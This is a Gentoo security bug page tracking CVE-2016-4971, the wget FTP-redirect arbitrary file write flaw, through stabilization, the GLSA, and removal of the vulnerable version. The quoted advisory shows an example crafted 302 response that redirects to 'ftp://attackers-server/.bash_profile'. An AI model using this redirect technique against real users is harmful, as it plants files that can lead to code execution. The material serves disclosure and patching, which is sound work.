Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 585926 (CVE-2016-4971) - <net-misc/wget-1.18: Lack of filename checking allows arbitrary file upload via FTP redirect (CVE-2016-4971)
Summary: <net-misc/wget-1.18: Lack of filename checking allows arbitrary file upload v...
Status: RESOLVED FIXED
Alias: CVE-2016-4971
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal major
Assignee: Gentoo Security
URL: https://lists.gnu.org/archive/html/in...
Whiteboard: A2 [glsa cve]
Keywords:
Depends on:
Blocks:
 
Reported: 2016-06-14 13:04 UTC by Agostino Sarubbo
Modified: 2016-11-01 06:11 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2016-06-14 13:04:31 UTC
From ${URL} :

GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code 
execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file.

Because of lack of sufficient controls in wget, when user downloads a file with wget, such as:

wget http://attackers-server/safe_file.txt

An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. 

For example, if the attacker's server replies with the following response:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to 
another HTTP resource with a different name.

Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.


@maintainer(s): since the fixed package is already in the tree, please let us know if it is ready for the stabilization or not.
Comment 1 SpanKY gentoo-dev 2016-06-14 16:14:59 UTC
i added 1.18 last nite.  should be fine for stable.
Comment 2 Tobias Klausmann (RETIRED) gentoo-dev 2016-06-14 16:32:18 UTC
Stable on alpha.
Comment 3 Aaron Bauman (RETIRED) gentoo-dev 2016-06-14 22:18:03 UTC
@arches, please stabilize:

=net-misc/wget-1.18
Comment 4 Jeroen Roovers (RETIRED) gentoo-dev 2016-06-15 15:41:05 UTC
Stable for PPC64.
Comment 5 Jeroen Roovers (RETIRED) gentoo-dev 2016-06-21 11:37:47 UTC
Stable for HPPA.
Comment 6 Markus Meier gentoo-dev 2016-06-21 18:33:10 UTC
arm stable
Comment 7 Agostino Sarubbo gentoo-dev 2016-06-27 08:24:24 UTC
amd64 stable
Comment 8 Agostino Sarubbo gentoo-dev 2016-06-27 08:51:45 UTC
x86 stable
Comment 9 GLSAMaker/CVETool Bot gentoo-dev 2016-07-02 11:49:54 UTC
CVE-2016-4971 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4971):
  GNU wget before 1.18 allows remote servers to write to arbitrary files by
  redirecting a request from HTTP to a crafted FTP resource.
Comment 10 Aaron Bauman (RETIRED) gentoo-dev 2016-07-02 11:55:38 UTC
Added to existing GLSA.
Comment 11 Agostino Sarubbo gentoo-dev 2016-07-08 08:00:01 UTC
ppc stable
Comment 12 Agostino Sarubbo gentoo-dev 2016-07-08 10:08:17 UTC
sparc stable
Comment 13 Agostino Sarubbo gentoo-dev 2016-07-08 12:07:38 UTC
ia64 stable.

Maintainer(s), please cleanup.
Security, please add it to the existing request, or file a new one.
Comment 14 Yury German Gentoo Infrastructure gentoo-dev 2016-09-10 07:46:50 UTC
Arches, Thank you for your work.
Added to an existing GLSA Request.

Maintainer(s), please drop the vulnerable version(s).
Version: 1.17.1-r1 : 0
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2016-10-29 13:35:43 UTC
This issue was resolved and addressed in
 GLSA 201610-11 at https://security.gentoo.org/glsa/201610-11
by GLSA coordinator Kristian Fiskerstrand (K_F).
Comment 16 Yury German Gentoo Infrastructure gentoo-dev 2016-10-31 05:25:45 UTC
Reopening for Cleanup - Version wget-1.17.1-r1 still in tree.
Comment 17 Lars Wendler (Polynomial-C) (RETIRED) gentoo-dev 2016-10-31 07:12:09 UTC
commit 98185b2fdd2323a4242c46a396174e9eb5409b17
Author: Lars Wendler <polynomial-c@gentoo.org>
Date:   Mon Oct 31 08:11:21 2016

    net-misc/wget: Removed vulnerable version.

    Package-Manager: portage-2.3.2
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
Comment 18 Aaron Bauman (RETIRED) gentoo-dev 2016-11-01 06:11:23 UTC
Thanks!